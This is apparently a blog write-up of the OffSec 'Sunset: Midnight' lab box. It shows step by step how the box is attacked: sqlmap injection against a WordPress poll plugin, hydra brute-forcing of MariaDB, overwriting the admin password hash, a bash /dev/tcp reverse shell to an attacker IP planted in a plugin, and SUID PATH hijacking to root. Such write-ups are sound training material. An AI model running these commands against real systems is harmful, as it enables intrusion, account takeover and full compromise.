Offsec: Sunset Midnight

J

Another box. Another WordPress install. And another reminder why enumeration > assumptions. Let’s break down Sunset: Midnight step by step.

Nmap Scan

Started with a full TCP scan.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3306/tcp open  mysql   MariaDB 5.5.5-10.3.22
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: SupportsCompression, Speaks41ProtocolNew, Support41Auth, ConnectWithDatabase, FoundRows, InteractiveClient, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolOld, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 9H@ExPf0XN\efP>%;:Ob
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration (Port 80)

Visiting the site revealed:

  • Default WordPress installation
  • User: admin
  • Plugin: simple-poll-master
  • Version: 1.5.0

At first glance, nothing obvious. But after researching the plugin version, I found that version 1.4.1 had a known SQL injection — and reports suggested 1.5.0 was also vulnerable.

The vulnerable endpoint:

/wp-admin/admin-ajax.php

With parameter:

action=spAjaxResults&pollid=2

SQL Injection with sqlmap

sqlmap -u "http://sunset-midnight/wp-admin/admin-ajax.php" \
--data="action=spAjaxResults&pollid=2" \
-D wordpress_db --tables --batch

It worked — but extraction was slow. Since MySQL (MariaDB) was exposed on port 3306, I pivoted.

MySQL Enumeration (Port 3306)

After identifying valid credentials using hydra, I logged in directly to MariaDB.

Listing databases:

show databases;

Found:

  • wordpress_db

Checking users:

select user, password from mysql.user;

Then inside WordPress DB:

select user_login, user_pass from wp_users;

Found:

  • admin user
  • WordPress password hash

Cracking hashes didn’t work. But then I realized: I was root in the database. Instead of cracking — just change it.

UPDATE wordpress_db.wp_users 
SET user_pass = MD5('Password123!') 
WHERE user_login = 'admin';

WordPress accepts MD5 during login and rehashes automatically. Logged in successfully as admin.

Gaining RCE via WordPress

Editing the theme directly failed:

However, modifying an installed plugin worked:

I injected a simple reverse shell and triggered it via the browser:

bash -c "bash -i >& /dev/tcp/<attacker_ip>/9001 0>&1"

#Url encoded
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.225%2F9001%200%3E%261%22

Got a shell.

Lateral Movement – Credential Reuse

While enumerating, I discovered that user jose reused credentials. SSH access worked with the reused password. Always try credential reuse — especially after database compromise.

Privilege Escalation

While performing standard enumeration (linpeas, manual checks), I found:

Permissions:

-rwsr-sr-x 1 root root 16768 Jul 18  2020 /usr/bin/status

SUID binary running as root.

Analyzing the Binary

Using strings:

strings /usr/bin/status

Revealed:

service ssh status
system()

The binary calls:

service ssh status

But it does not use an absolute path. This means it relies on $PATH. Classic PATH hijacking opportunity.

Exploiting PATH Hijacking

Create a fake service binary:

echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service

Prepend /tmp to PATH:

export PATH=/tmp:$PATH

Run the vulnerable binary:

/usr/bin/status

Root shell:

Lessons Learned

This box highlights several important concepts:

  1. Exposed databases drastically increase attack surface.
  2. SQL injection doesn’t always need full data extraction — sometimes logic abuse is faster.
  3. If you control the database, you control the application.
  4. Credential reuse is still one of the most reliable privilege escalation techniques.
  5. SUID binaries must use absolute paths.
  6. PATH hijacking remains a classic but powerful attack vector.

Related Posts